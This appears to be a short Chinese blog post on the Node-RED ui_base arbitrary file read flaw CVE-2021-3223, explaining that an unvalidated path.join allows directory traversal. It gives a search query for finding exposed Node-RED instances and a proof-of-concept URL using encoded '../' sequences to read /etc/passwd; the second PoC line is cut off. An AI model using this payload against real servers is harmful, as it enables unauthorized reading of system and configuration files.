Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223

原创

于 2021-11-25 15:00:00 发布 · 1.1k 阅读

CC 4.0 BY-SA版权

文章标签：

本文详细介绍了Node-RED中ui_base组件存在的任意文件读取漏洞（CVE-2021-3223），由于路径拼接时的安全疏漏，攻击者能遍历并读取服务器上的敏感文件，如settings.js。通过构造特定的URL请求，可以复现该漏洞。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

Node-RED 在/nodes/ui_base.js中，URL与’/ui_base/js/*'匹配，然后传递给path.join，

缺乏对最终路径的验证会导致路径遍历漏洞，可以利用这个漏洞读取服务器上的敏感数据，比如settings.js

title=“Node-RED”

访问页面
在这里插入图片描述
验证poc


/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%

200万优质内容无限畅学